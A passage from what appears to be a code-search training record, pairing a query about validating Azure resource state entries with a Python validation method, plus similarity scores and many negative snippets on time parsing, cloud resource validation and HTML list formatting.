"def _parse_time(time_string: str, source: str = \"input\") -> Optional[datetime.datetime]:\n if not time_string:\n return None\n\n format_string = \"%Y-%m-%d\" if source == \"input\" else \"%Y-%m-%dT%H:%M:%SZ\"\n try:\n return datetime.datetime.strptime(time_string, format_string)\n except ValueError:\n raise AnalyzerError(\"Incorrect date format\")",
"def parse_time(time_string):\n times = time_string.split(\"\\n\")\n\n user_time_str = times[-2].split(\"\\t\")[-1]\n sys_time_str = times[-1].split(\"\\t\")[-1]\n\n #print user_time_str, sys_time_str\n\n user_time = parse_m_s(user_time_str)\n sys_time = parse_m_s(sys_time_str)\n\n return user_time + sys_time",
"def parse_time(text):\n try:\n if len(text) == 17:\n date = datetime.datetime.strptime(text, '%Y-%m-%dT%H:%MZ')\n elif len(text) == 20:\n date = datetime.datetime.strptime(text, '%Y-%m-%dT%H:%M:%SZ')\n else:\n date = datetime.datetime.utcnow()\n except Exception as _:\n date = datetime.datetime.utcnow()\n return date",
"def parse_time(time_string, time_format='', **kwargs):\n if isinstance(time_string, pandas.Timestamp):\n return time_string.to_pydatetime()\n elif isinstance(time_string, datetime) or time_format == 'datetime':\n return time_string\n elif isinstance(time_string, tuple):\n return datetime(*time_string)\n elif time_format == 'utime' or isinstance(time_string, (int, float)):\n return datetime(1979, 1, 1) + timedelta(0, time_string)\n elif isinstance(time_string, pandas.DatetimeIndex):\n return time_string._mpl_repr()\n elif isinstance(time_string, np.ndarray) and 'datetime64' in str(time_string.dtype):\n ii = [ss.astype(datetime) for ss in time_string]\n # Validate (in an agnostic way) that we are getting a datetime rather than a date\n return np.array([datetime(*(dt.timetuple()[:6])) for dt in ii])\n elif time_string is 'now':\n return datetime.utcnow()\n elif isinstance(time_string, astropy.time.Time):\n return time_string.datetime\n else:\n # remove trailing zeros and the final dot to allow any\n # number of zeros. This solves issue #289\n if '.' in time_string:\n time_string = time_string.rstrip(\"0\").rstrip(\".\")\n for time_format in TIME_FORMAT_LIST:\n try:\n try:\n ts, time_delta = _regex_parse_time(time_string,\n time_format)\n except TypeError:\n break\n if ts is None:\n continue\n return datetime.strptime(ts, time_format) + time_delta\n except ValueError:\n pass\n\n time_string_parse_format = kwargs.pop('_time_string_parse_format', None)\n if time_string_parse_format is not None:\n # Following a comment by the Lead Developer, the Try / except clause\n # is replaced. The Lead Developer thinks that this the try/except\n # clause is related to SunPy's database module.\n try:\n ts, time_delta = _regex_parse_time(time_string,\n time_string_parse_format)\n if ts and time_delta:\n return datetime.strptime(ts, time_string_parse_format) + time_delta\n else:\n return datetime.strptime(time_string, time_string_parse_format)\n except Exception:\n pass\n raise ValueError(\"'{tstr!s}' is not a valid time string!\".format(tstr=time_string))",
"def parse_time(expr):\n # first deal with hour\n hsp = expr.lower().split('h')\n if len(hsp) > 1: h = int(hsp[0])\n else: h = 0\n # now hour is out of the way\n expr = hsp[-1]\n msp = expr.lower().split('m')\n if len(msp) > 1: m = int(msp[0])\n else: m = 0\n return f\"{h:02d}:{m:02d}:00\"",
"def time_trans(datetime_str):\n\t\tif re.compile(\"(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)\").match(datetime_str):\n\t\t\treturn datetime.strptime(datetime_str, \"%Y-%m-%d %H:%M:%S\")",
"def parse_times(time_str):\n warnings = []\n days, interval = time_str.split(',')\n assert int(days) == float(days)\n days = int(days)\n assert int(interval) == float(interval)\n interval = int(interval)\n if interval < 3:\n warnings.append('Minimum interval is 3 hours')\n if days > 14:\n warnings.append('Maximum spot forecast period is 14 days')\n hours = np.arange(days * 24 + 1)[::interval]\n return hours.tolist(), warnings",
"def parse_task_time(line):\n stripret = \"\".join(line.split())\n p = re.compile(r'\\d+\\.\\d{2}-\\d+\\.\\d{2}')\n findret = p.findall(stripret) \n if findret:\n formatstr = \" \".join(line.split())\n timeregx = r'\\d+\\.\\d{2}\\s*-\\s*\\d+\\.\\d{2}'\n time = re.compile(timeregx).findall(formatstr)[0].replace(\" \", \"\").replace(\":\", \".\")\n taskcontext = re.sub(timeregx, \"\", formatstr).strip().replace(\":\", \"\")\n return [taskcontext, time]\n else:\n # log it if line can't be parse\n logging.warning(\"unparsed line: [%r]\" % line)",
"def _get_date(str_time, time_formats = [\"%Y-%m-%d %H:%M:%S.%f\", \"%Y-%m-%d %H:%M:%S\"]):\r\n time = None\r\n for time_format in time_formats:\r\n try:\r\n time = datetime.strptime(str_time, time_format)\r\n if time:\r\n break\r\n except:\r\n pass\r\n return time",
"def parse_timestr(self, timestr):\n\n epoch = datetime.datetime(1970, 1, 1, 0, 0, 0, 0, tzutc())\n return int((parsedate(timestr) - epoch).total_seconds())"
] |
[
"0.6994127",
"0.6513669",
"0.6467536",
"0.6286688",
"0.6278909",
"0.6250281",
"0.62317115",
"0.62049",
"0.61825174",
"0.6160859",
"0.614465",
"0.6121751",
"0.6065498",
"0.603659",
"0.5991278",
"0.59244233",
"0.5907265",
"0.5903873",
"0.5901057",
"0.5886875",
"0.5869222",
"0.58245033",
"0.5805645",
"0.5800728",
"0.5792937",
"0.57811046",
"0.57728523",
"0.5762272",
"0.57442397",
"0.57422864"
] |
0.7575806
|
0
|
Validate the sanity of the Azure resource details obtained from the global state.
|
def __validateResourceStateEntry(self, resource: Dict[str, str]):
if AZ_RESOURCE_ID not in resource:
raise ValueError(
'[%s] %s is not present in the armMapping.' % (
self.fullName, AZ_RESOURCE_ID))
if SID not in resource:
raise ValueError(
'[%s] %s is not present in the armMapping.' % (self.fullName, SID))
if ARM_TYPE not in resource:
raise ValueError(
'[%s] %s is not present in the armMapping.' % (self.fullName, ARM_TYPE))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _validate_stack(self, _stack):\n\n if len(_stack) == 0 or \"resources\" not in _stack.keys():\n self.status = \"na: no resource in stack\"\n self.logger.warning(\"non-applicable to valet: no resource in stack\")\n return {}\n\n stack = {}\n\n for rk, r in _stack[\"resources\"].items():\n if \"type\" not in r.keys():\n self.status = \"type key is missing in stack\"\n return None\n\n if r[\"type\"] == \"OS::Nova::Server\":\n if \"properties\" not in r.keys():\n self.status = \"properties key is missing in stack\"\n return None\n\n if \"name\" not in r[\"properties\"].keys():\n self.status = \"name property is missing in stack\"\n return None\n\n if r[\"properties\"][\"name\"] is None:\n self.status = \"name property is none\"\n return None\n\n if \"flavor\" not in r[\"properties\"].keys():\n self.status = \"flavor property is missing in stack\"\n return None\n\n if r[\"properties\"][\"flavor\"] is None:\n self.status = \"flavor property is none\"\n return None\n\n stack[rk] = r\n\n if len(stack) == 0:\n self.status = \"na: no server resource in stack\"\n self.logger.warning(\"non-applicable to valet: no server resource in stack\")\n return {}\n\n first_resource = stack[list(stack)[0]]\n apply_valet = False\n\n # To apply Valet decision, availability_zone must exist.\n # And its value contains host variable as a list element.\n if \"availability_zone\" in first_resource[\"properties\"].keys():\n az_value = first_resource[\"properties\"][\"availability_zone\"]\n if isinstance(az_value, list):\n apply_valet = True\n\n for rk, r in stack.items():\n if apply_valet:\n if \"availability_zone\" not in r[\"properties\"].keys():\n self.status = \"az is missing in stack for valet\"\n return None\n else:\n az_value = r[\"properties\"][\"availability_zone\"]\n if not isinstance(az_value, list):\n self.status = \"host variable is missing in stack for valet\"\n return None\n\n if az_value[0] in (\"none\", \"None\") or az_value[1] in (\"none\", \"None\"):\n self.status = \"az value is missing in stack\"\n return None\n else:\n if \"availability_zone\" in r[\"properties\"].keys():\n az_value = r[\"properties\"][\"availability_zone\"]\n if isinstance(az_value, list):\n self.status = \"host variable exists in stack for non-valet application\"\n return None\n\n if not apply_valet:\n self.status = \"na: pass valet\"\n self.logger.warning(\"non-applicable to valet\")\n return {}\n else:\n return stack",
"def _check_azure_metadata_service() -> None:\n try:\n jsn = requests.get(\n AZURE_METADATA_SERVICE_INSTANCE_URL,\n params={\"api-version\": \"2021-02-01\"},\n headers={\"Metadata\": \"true\"},\n timeout=2,\n ).json()\n if \"compute\" not in jsn or \"azEnvironment\" not in jsn[\"compute\"]:\n raise AirflowException(\n f\"Was able to fetch some metadata, but it doesn't look like Azure Metadata: {jsn}\"\n )\n except (requests_exceptions.RequestException, ValueError) as e:\n raise AirflowException(f\"Can't reach Azure Metadata Service: {e}\")",
"async def _a_check_azure_metadata_service(self):\n try:\n async with self._session.get(\n url=AZURE_METADATA_SERVICE_INSTANCE_URL,\n params={\"api-version\": \"2021-02-01\"},\n headers={\"Metadata\": \"true\"},\n timeout=2,\n ) as resp:\n jsn = await resp.json()\n if \"compute\" not in jsn or \"azEnvironment\" not in jsn[\"compute\"]:\n raise AirflowException(\n f\"Was able to fetch some metadata, but it doesn't look like Azure Metadata: {jsn}\"\n )\n except (requests_exceptions.RequestException, ValueError) as e:\n raise AirflowException(f\"Can't reach Azure Metadata Service: {e}\")",
"def _sanity_check(self):\n if self.root.alert_type != ANALYSIS_TYPE_CLOUDPHISH:\n return False\n\n # update the status of this cloudphish request in the database to\n # indicate we've started analyzing it\n\n # lots of sanity checking first\n if not self.root.details or not isinstance(self.root.details, dict):\n logging.error(\"missing or invalid details in {} (details = {})\".format(self.root, self.root.details))\n return False\n\n if KEY_DETAILS_SHA256_URL not in self.root.details:\n logging.error(\"missing key {} in details of {}\".format(KEY_DETAILS_SHA256_URL, self.root))\n return False\n\n if not self.root.details[KEY_DETAILS_SHA256_URL]:\n logging.error(\"missing value for {} in details of {}\".format(KEY_DETAILS_SHA256_URL, self.root))\n return False\n\n return True",
"def _check_validity(self):\n pass",
"def test_is_valid_resource():\n mock_name = \"rg-001\"\n output = sh.is_valid_resource(mock_name)\n assert output is True",
"def validate(self):\n # Validate all mandatory keys are present\n if not self.mandatory_keys.issubset(set(self.resource)):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] miss a \"\n \"mandatory key. Please check the model.\" % (\n self.__class__.MODEL_TYPE,\n self.id))\n\n # Validate the resource does not contains extra keys\n if not set(self.resource).issubset(self.keys):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] contains \"\n \"extra keys. Please check the model.\" % (\n self.__class__.MODEL_TYPE,\n self.id))\n\n # Validate the resource value type\n for key, value in self.resource.items():\n if not isinstance(value, self.__class__.MODEL[key][0]):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] has an invalid \"\n \"key (%s) data type (expected: %s)\" % (\n self.__class__.MODEL_TYPE,\n self.id,\n key,\n self.__class__.MODEL[key][0]))\n # For str type validate the content as according the regex\n if self.__class__.MODEL[key][0] is str:\n if not re.match(self.__class__.MODEL[key][1], value):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] has an invalid \"\n \"key (%s) data content (expected match : %s)\" % (\n self.__class__.MODEL_TYPE,\n self.id,\n key,\n self.__class__.MODEL[key][1]))\n # For list type validate the content as according the regex\n if self.__class__.MODEL[key][0] is list:\n if not all([re.match(self.__class__.MODEL[key][1], v)\n for v in value]):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] has an invalid \"\n \"key (%s) data content (expected match : %s)\" % (\n self.__class__.MODEL_TYPE,\n self.id,\n key,\n self.__class__.MODEL[key][1]))",
"def sanity_check(self):\n pass",
"def _check(self):\n assert self._leaves, (\n 'Need to validate AssetAllocation before using it.')",
"def validate_availability_zones(self, context, resource_type,\n availability_zones):",
"def _resource_name_check(self, resource_name):\n return self._name_check(resource_name, 'resources')",
"def creation_validation(**_):\n\n for property_key in constants.VOLUME_REQUIRED_PROPERTIES:\n utils.validate_node_property(property_key, ctx.node.properties)\n\n volume_object = _get_volumes_from_id(utils.get_resource_id())\n\n if ctx.node.properties['use_external_resource'] and not volume_object:\n raise NonRecoverableError(\n 'External resource, but the supplied '\n 'EBS volume does not exist in the account.')\n\n if not ctx.node.properties['use_external_resource'] and volume_object:\n raise NonRecoverableError(\n 'Not external resource, but the supplied '\n 'EBS volume exists in the account.')",
"def validate(self) -> bool:\n # Call RH for the collector VM. If the call is successful, the collector VM has been assigned the right roles.\n collectorVM = AzureInstanceMetadataService.getComputeInstance(\n self.tracer, self.name)\n collectorVMArmId = ARM_ID_TEMPLATE % (\n collectorVM[SUBSCRIPTION_ID], collectorVM[RESOURCE_GROUP_NAME], collectorVM[NAME])\n rhClient = ResourceHealth(self.tracer)\n try:\n rhEvents = rhClient.getHistoricalResourceAvailabilityEvents(\n self.ctx.authToken, collectorVMArmId)\n except Exception as e:\n self.tracer.error(\n \"[%s] RH call validation failed(%s).\", self.fullName, e, exc_info=True)\n return False\n\n return True",
"def test_check_resource(self):\n s1 = System()\n b1 = Books(\"1984\", \"George Orwell\", \"Harvill Secker\", \"1949\", \"0123456789123\")\n self.assertEqual(s1.check_resource(b1), False)\n s1.add_resource(b1)\n self.assertEqual(s1.check_resource(b1), True)",
"def validate_metadata(self):\n metadata = self.get_client_metadata()\n\n return True",
"def resources():\n check_resources()",
"def sanity_check(self):\n return True",
"def _validate(self):\n pass",
"def resource_details(self) -> pulumi.Input[Union['AzureResourceDetailsArgs', 'OnPremiseResourceDetailsArgs', 'OnPremiseSqlResourceDetailsArgs']]:\n return pulumi.get(self, \"resource_details\")",
"def _validate_config(self):\n pass",
"def _validate_subcloud_config(self,\n context,\n name,\n management_subnet_str,\n management_start_ip_str,\n management_end_ip_str,\n management_gateway_ip_str,\n systemcontroller_gateway_ip_str):\n\n # Validate the name\n if name.isdigit():\n pecan.abort(400, _(\"name must contain alphabetic characters\"))\n\n if name in [consts.DEFAULT_REGION_NAME,\n consts.SYSTEM_CONTROLLER_NAME]:\n pecan.abort(400, _(\"name cannot be %(bad_name1)s or %(bad_name2)s\")\n % {'bad_name1': consts.DEFAULT_REGION_NAME,\n 'bad_name2': consts.SYSTEM_CONTROLLER_NAME})\n\n # Parse/validate the management subnet\n subcloud_subnets = []\n subclouds = db_api.subcloud_get_all(context)\n for subcloud in subclouds:\n subcloud_subnets.append(IPNetwork(subcloud.management_subnet))\n\n MIN_MANAGEMENT_SUBNET_SIZE = 8\n # subtract 3 for network, gateway and broadcast addresses.\n MIN_MANAGEMENT_ADDRESSES = MIN_MANAGEMENT_SUBNET_SIZE - 3\n\n management_subnet = None\n try:\n management_subnet = validate_network_str(\n management_subnet_str,\n minimum_size=MIN_MANAGEMENT_SUBNET_SIZE,\n existing_networks=subcloud_subnets)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-subnet invalid: %s\") % e)\n\n # Parse/validate the start/end addresses\n management_start_ip = None\n try:\n management_start_ip = validate_address_str(\n management_start_ip_str, management_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-start-ip invalid: %s\") % e)\n\n management_end_ip = None\n try:\n management_end_ip = validate_address_str(\n management_end_ip_str, management_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-end-ip invalid: %s\") % e)\n\n if not management_start_ip < management_end_ip:\n pecan.abort(\n 400,\n _(\"management-start-ip not less than management-end-ip\"))\n\n if not len(IPRange(management_start_ip, management_end_ip)) >= \\\n MIN_MANAGEMENT_ADDRESSES:\n pecan.abort(\n 400,\n _(\"management address range must contain at least %d \"\n \"addresses\") % MIN_MANAGEMENT_ADDRESSES)\n\n # Parse/validate the gateway\n try:\n validate_address_str(\n management_gateway_ip_str, management_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-gateway-ip invalid: %s\") % e)\n\n # Ensure subcloud management gateway is not within the actual subcloud\n # management subnet address pool for consistency with the\n # systemcontroller gateway restriction below. Address collision\n # is not a concern as the address is added to sysinv.\n subcloud_mgmt_address_start = IPAddress(management_start_ip_str)\n subcloud_mgmt_address_end = IPAddress(management_end_ip_str)\n subcloud_mgmt_gw_ip = IPAddress(management_gateway_ip_str)\n if ((subcloud_mgmt_gw_ip >= subcloud_mgmt_address_start) and\n (subcloud_mgmt_gw_ip <= subcloud_mgmt_address_end)):\n pecan.abort(400, _(\"management-gateway-ip invalid, \"\n \"is within management pool: %(start)s - \"\n \"%(end)s\") %\n {'start': subcloud_mgmt_address_start,\n 'end': subcloud_mgmt_address_end})\n\n # Ensure systemcontroller gateway is in the management subnet\n # for the systemcontroller region.\n management_address_pool = self._get_management_address_pool(context)\n systemcontroller_subnet_str = \"%s/%d\" % (\n management_address_pool.network,\n management_address_pool.prefix)\n systemcontroller_subnet = IPNetwork(systemcontroller_subnet_str)\n try:\n validate_address_str(\n systemcontroller_gateway_ip_str, systemcontroller_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"systemcontroller-gateway-ip invalid: %s\") % e)\n # Ensure systemcontroller gateway is not within the actual\n # management subnet address pool to prevent address collision.\n mgmt_address_start = IPAddress(management_address_pool.ranges[0][0])\n mgmt_address_end = IPAddress(management_address_pool.ranges[0][1])\n systemcontroller_gw_ip = IPAddress(systemcontroller_gateway_ip_str)\n if ((systemcontroller_gw_ip >= mgmt_address_start) and\n (systemcontroller_gw_ip <= mgmt_address_end)):\n pecan.abort(400, _(\"systemcontroller-gateway-ip invalid, \"\n \"is within management pool: %(start)s - \"\n \"%(end)s\") %\n {'start': mgmt_address_start, 'end': mgmt_address_end})",
"def test_nonstandard_resource(self):\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['resources']['scalar'].append({'name': 'chocolate', 'value': 1.0 })\n config = copy.deepcopy(self.configuration)\n json_data = {\n 'manifest': manifest,\n 'configuration': config\n }\n\n url = '/%s/job-types/validation/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n results = json.loads(response.content)\n self.assertTrue(results['is_valid'])\n self.assertEqual(len(results['warnings']), 1)\n self.assertEqual(results['warnings'][0]['name'], 'NONSTANDARD_RESOURCE')",
"def test_determine_valid_virtualization_realms(self):\n pass",
"def test_resource_err(self, integrationtest, k8sconfig):\n # Fixtures.\n config = self.k8sconfig(integrationtest, k8sconfig)\n err_resp = (K8sResource(\"\", \"\", \"\", False, \"\"), True)\n MM = MetaManifest\n\n # Sanity check: ask for a valid StatefulSet.\n _, err = k8s.resource(config, MM(\"apps/v1\", \"StatefulSet\", \"ns\", \"name\"))\n assert not err\n\n # Ask for a StatefulSet on a bogus API endpoint.\n assert k8s.resource(config, MM(\"bogus\", \"StatefulSet\", \"ns\", \"name\")) == err_resp\n\n # Ask for a bogus K8s kind.\n assert k8s.resource(config, MM(\"v1\", \"Bogus\", \"ns\", \"name\")) == err_resp\n assert k8s.resource(config, MM(\"\", \"Bogus\", \"ns\", \"name\")) == err_resp",
"def validate_config(self):\n pass",
"def validate_config(self):\n pass",
"def validate(self):\n try:\n # update _resource to have default values from the schema\n self._resource = self.schema(self._resource)\n except MultipleInvalid as e:\n errors = [format_error(err, self.resource_type) for err in e.errors]\n raise exceptions.ValidationError({'errors': errors})\n\n yield self.check_unique()",
"def __validate(self):\n pass",
"def check_validity(self):",
"def _validate_resources(self):\n resources = self.options.resources\n\n for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '\n 'parallelization is not supported, only a value of `1` is accepted.'\n )"
] |
[
"0.5771019",
"0.5764822",
"0.5651339",
"0.5575817",
"0.5543914",
"0.55022097",
"0.5467342",
"0.5466281",
"0.54335773",
"0.5416878",
"0.5407321",
"0.53656614",
"0.53434116",
"0.53363395",
"0.5335866",
"0.5316301",
"0.53111744",
"0.5309585",
"0.5295233",
"0.52703154",
"0.5262302",
"0.5248834",
"0.5244604",
"0.52398956",
"0.5239536",
"0.5239536",
"0.52328485",
"0.52265793",
"0.5214296",
"0.52081424"
] |
0.660925
|
0
|
Convert the Json array structure of recommendedActions into an HTML list.
|
def __formatToHtml(self, recommendedActions: List[Dict[str, str]]) -> str:
recommendedSteps = []
for action in recommendedActions:
actionText = action[ACTION]
# Replace the <action> and </action> tags as the action url can't be replaced since they are not absolute urls.
actionText = actionText.replace(ACTION_HTML_OPEN_TAG, '')
actionText = actionText.replace(ACTION_HTML_CLOSE_TAG, '')
recommendedSteps.append(actionText)
# Convert the list to HTML <li> format.
actionsAsHtmlListElements = self.__convertToHtmlListElement(
recommendedSteps)
# Format the html template with the <li> elements.
htmlContent = RECOMMENDED_ACTIONS_HTML_TEMPLATE % actionsAsHtmlListElements
return htmlContent
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_actions() -> None:\n colorama_init()\n max_action_name_len = max(len(name) for name in KNOWN_ACTIONS.keys())\n wrapper = textwrap.TextWrapper(\n width=80 - max_action_name_len - 3,\n subsequent_indent=' ' * (max_action_name_len + 3),\n )\n print(\n '{bright}{name:<{max_action_name_len}} -{normal} {doc}'.format(\n bright=Style.BRIGHT,\n name='name',\n max_action_name_len=max_action_name_len,\n normal=Style.NORMAL,\n doc='description [(argument: type, ...)]',\n )\n )\n print('-' * 80)\n for name, action in KNOWN_ACTIONS.items():\n wrapped_doc = wrapper.fill(' '.join(str(action.__doc__).split()))\n print(\n '{bright}{name:<{max_action_name_len}} -{normal} {doc}'.format(\n bright=Style.BRIGHT,\n name=name,\n max_action_name_len=max_action_name_len,\n normal=Style.NORMAL,\n doc=wrapped_doc,\n )\n )\n return None",
"def review_list_handler():\n return jsonify(languages=supported_languages)",
"def _generate_actions(self) -> list:\n pass",
"async def listreact(self, ctx):\n emojis = await self.conf.guild(ctx.guild).reactions()\n msg = f\"Smart Reactions for {ctx.guild.name}:\\n\"\n for emoji in emojis:\n for command in emojis[emoji]:\n msg += f\"{emoji}: {command}\\n\"\n for page in pagify(msg, delims=[\"\\n\"]):\n await ctx.send(page)",
"def _parse_actions_list(self, actions_cfg, dataset_name):\n # iterate over actions and parse\n for i, cfg in enumerate(actions_cfg):\n actions_cfg[i] = self._parse_action(cfg, dataset_name)\n\n return actions_cfg",
"def _process_html(self) -> None:\n opinion_json = self.request[\"response\"].json()\n for case in opinion_json:\n url = self._get_url(case[\"docketNumber\"], case[\"docketEntryId\"])\n status = (\n \"Published\"\n if case[\"documentType\"] == \"T.C. Opinion\"\n else \"Unpublished\"\n )\n self.cases.append(\n {\n \"judge\": case[\"judge\"],\n \"date\": case[\"filingDate\"][:10],\n \"docket\": case[\"docketNumber\"],\n \"url\": url,\n \"name\": titlecase(case[\"caseCaption\"]),\n \"status\": status,\n }\n )",
"def list(self):\n\n return list(\n filter(\n lambda x: x.get('type') != 'tagit', # pragma: no cover\n self._post(\n request=ApiActions.LIST.value,\n uri=ApiUri.ACTIONS.value,\n ).get('actions')\n )\n )",
"def list_of_stories():\n return render_template(\"list_of_stories.html\", stories = stories.values())",
"def _convert_longform_feedback_to_html(self, response_items):\r\n\r\n # We want to display available feedback in a particular order.\r\n # This dictionary specifies which goes first--lower first.\r\n priorities = {\r\n # These go at the start of the feedback\r\n 'spelling': 0,\r\n 'grammar': 1,\r\n # needs to be after all the other feedback\r\n 'markup_text': 3\r\n }\r\n do_not_render = ['topicality', 'prompt-overlap']\r\n\r\n default_priority = 2\r\n\r\n def get_priority(elt):\r\n \"\"\"\r\n Args:\r\n elt: a tuple of feedback-type, feedback\r\n Returns:\r\n the priority for this feedback type\r\n \"\"\"\r\n return priorities.get(elt[0], default_priority)\r\n\r\n def encode_values(feedback_type, value):\r\n feedback_type = str(feedback_type).encode('ascii', 'ignore')\r\n if not isinstance(value, basestring):\r\n value = str(value)\r\n value = value.encode('ascii', 'ignore')\r\n return feedback_type, value\r\n\r\n def format_feedback(feedback_type, value):\r\n feedback_type, value = encode_values(feedback_type, value)\r\n feedback = u\"\"\"\r\n <div class=\"{feedback_type}\">\r\n {value}\r\n </div>\r\n \"\"\".format(feedback_type=feedback_type, value=value)\r\n return feedback\r\n\r\n def format_feedback_hidden(feedback_type, value):\r\n feedback_type, value = encode_values(feedback_type, value)\r\n feedback = \"\"\"\r\n <input class=\"{feedback_type}\" type=\"hidden\" value=\"{value}\" />\r\n \"\"\".format(feedback_type=feedback_type, value=value)\r\n return feedback\r\n\r\n # TODO (vshnayder): design and document the details of this format so\r\n # that we can do proper escaping here (e.g. are the graders allowed to\r\n # include HTML?)\r\n\r\n _ = self.system.service(self, \"i18n\").ugettext\r\n for tag in ['success', 'feedback', 'submission_id', 'grader_id']:\r\n if tag not in response_items:\r\n # This is a student_facing_error\r\n return format_feedback(\r\n # Translators: the `grader` refers to the grading service open response problems\r\n # are sent to, either to be machine-graded, peer-graded, or instructor-graded.\r\n 'errors', _('Error getting feedback from grader.')\r\n )\r\n\r\n feedback_items = response_items['feedback']\r\n try:\r\n feedback = json.loads(feedback_items)\r\n except (TypeError, ValueError):\r\n # This is a dev_facing_error\r\n log.exception(\"feedback_items from external open ended grader have invalid json {0}\".format(feedback_items))\r\n # This is a student_facing_error\r\n return format_feedback(\r\n # Translators: the `grader` refers to the grading service open response problems\r\n # are sent to, either to be machine-graded, peer-graded, or instructor-graded.\r\n 'errors', _('Error getting feedback from grader.')\r\n )\r\n\r\n if response_items['success']:\r\n if len(feedback) == 0:\r\n # This is a student_facing_error\r\n return format_feedback(\r\n # Translators: the `grader` refers to the grading service open response problems\r\n # are sent to, either to be machine-graded, peer-graded, or instructor-graded.\r\n 'errors', _('No feedback available from grader.')\r\n )\r\n\r\n for tag in do_not_render:\r\n if tag in feedback:\r\n feedback.pop(tag)\r\n\r\n feedback_lst = sorted(feedback.items(), key=get_priority)\r\n feedback_list_part1 = u\"\\n\".join(format_feedback(k, v) for k, v in feedback_lst)\r\n else:\r\n # This is a student_facing_error\r\n feedback_list_part1 = format_feedback('errors', response_items['feedback'])\r\n\r\n feedback_list_part2 = (u\"\\n\".join([format_feedback_hidden(feedback_type, value)\r\n for feedback_type, value in response_items.items()\r\n if feedback_type in ['submission_id', 'grader_id']]))\r\n\r\n return u\"\\n\".join([feedback_list_part1, feedback_list_part2])",
"def _generate_swipe_actions(ui_object_list):\n action_list = []\n action_rule = common.ActionRules.SWIPE_TO_OBJECT_RULE\n\n for object_index, ui_object in enumerate(ui_object_list):\n if _valid_object_with_name(ui_object):\n (verb_str,\n action_type) = _get_verb_str_action_type('swipe', ui_object.obj_type)\n obj_desc_str = _get_obj_desc_str(action_rule, ui_object)\n action = common.Action(\n verb_str=verb_str,\n obj_desc_str=obj_desc_str,\n input_content_str=config.LABEL_DEFAULT_VALUE_STRING,\n action_type=action_type,\n action_rule=action_rule,\n target_obj_idx=object_index)\n action_list.append(action)\n\n for action_element in action_list:\n _fill_action_info(action_element)\n return action_list",
"def _get_html(course_updates_items):\r\n list_items = []\r\n for update in reversed(course_updates_items):\r\n # filter course update items which have status \"deleted\".\r\n if update.get(\"status\") != CourseInfoModule.STATUS_DELETED:\r\n list_items.append(u\"<article><h2>{date}</h2>{content}</article>\".format(**update))\r\n return u\"<section>{list_items}</section>\".format(list_items=\"\".join(list_items))",
"def actions(self):\n from moztrap.view.lists.actions import actions\n return actions",
"def get_list_of_actions(self):\n return self.actions",
"def _help_actions(self):\n actions_str = \"\"\n for (key, value) in self.actions_help.items():\n actions_str += \"command: %s\\n%s\\n\\n\" % (key, value)\n print(actions_str)\n sys.exit(0)",
"def grants_to_asciidoc(obj):\r\n\r\n if not obj.permits:\r\n return u''\r\n\r\n coldesctbl_attributes = '[cols=\"8m,%d*^3m\",options=\"header\",width=\"70%%\"]' % len(PERMITS_LIST)\r\n coldesctbl_header = \"|User or Role \" + ' '.join(['|%s' % k for k in PERMITS_LIST])\r\n \r\n # Some globals to locals\r\n table_sep = TABLE_SEP\r\n\r\n grt_rows = []\r\n for k,v in obj.permits.iteritems():\r\n s = '|**%s**' % k\r\n for p in PERMITS_LIST:\r\n s += '|%s' % {True:'GRANT',False:'REVOKE',None:''}[v[p]]\r\n grt_rows.append(s)\r\n grt_rows = '\\n'.join(grt_rows)\r\n\r\n return \"\"\"\r\n.Privileges\r\n%(coldesctbl_attributes)s\r\n%(table_sep)s\r\n%(coldesctbl_header)s\r\n%(grt_rows)s\r\n%(table_sep)s\r\n\"\"\" % locals()",
"def __convertToHtmlListElement(self, listOfStringValues: List[str]) -> str:\n return ''.join(f\"<li>{element}</li>\" for element in listOfStringValues)",
"def to_md(self):\n soup = BeautifulSoup(f\"<div id={self.action_id}></div>\", \"html.parser\")\n for action in self.actions:\n table = soup.new_tag(\"table\")\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag(\"tr\")\n td_key = soup.new_tag(\"td\", attrs={\"class\": \"field-key\"})\n td_val = soup.new_tag(\"td\", attrs={\"class\": \"field-value\"})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()",
"def action_list(self):\n already_visited, can_visit_list = self.check_hand()\n\n message = []\n\n for msg, hand in [('Visited', already_visited), ('Available', can_visit_list)]:\n bits = []\n\n for card in hand:\n h = Hero(card)\n rank = Hero.RANKS[h.client['rank']]\n\n # 10/J/Q/K/A\n bits.append(u'{0}{1}'.format(\n rank if h.client['rank'] == Hero.TEN else rank[0],\n Hero.FACE_SYMBOLS[h.client['race']]\n ))\n\n message.append(u'{0}={1}'.format(msg, ','.join(bits)))\n\n self.chat.send_message(EmrossWar.safe_text(', '.join(message)))",
"def actions(self, request, action_list, group):\n return action_list",
"def get_actions(self):\n return []",
"def actions(self):\n return self._action_list",
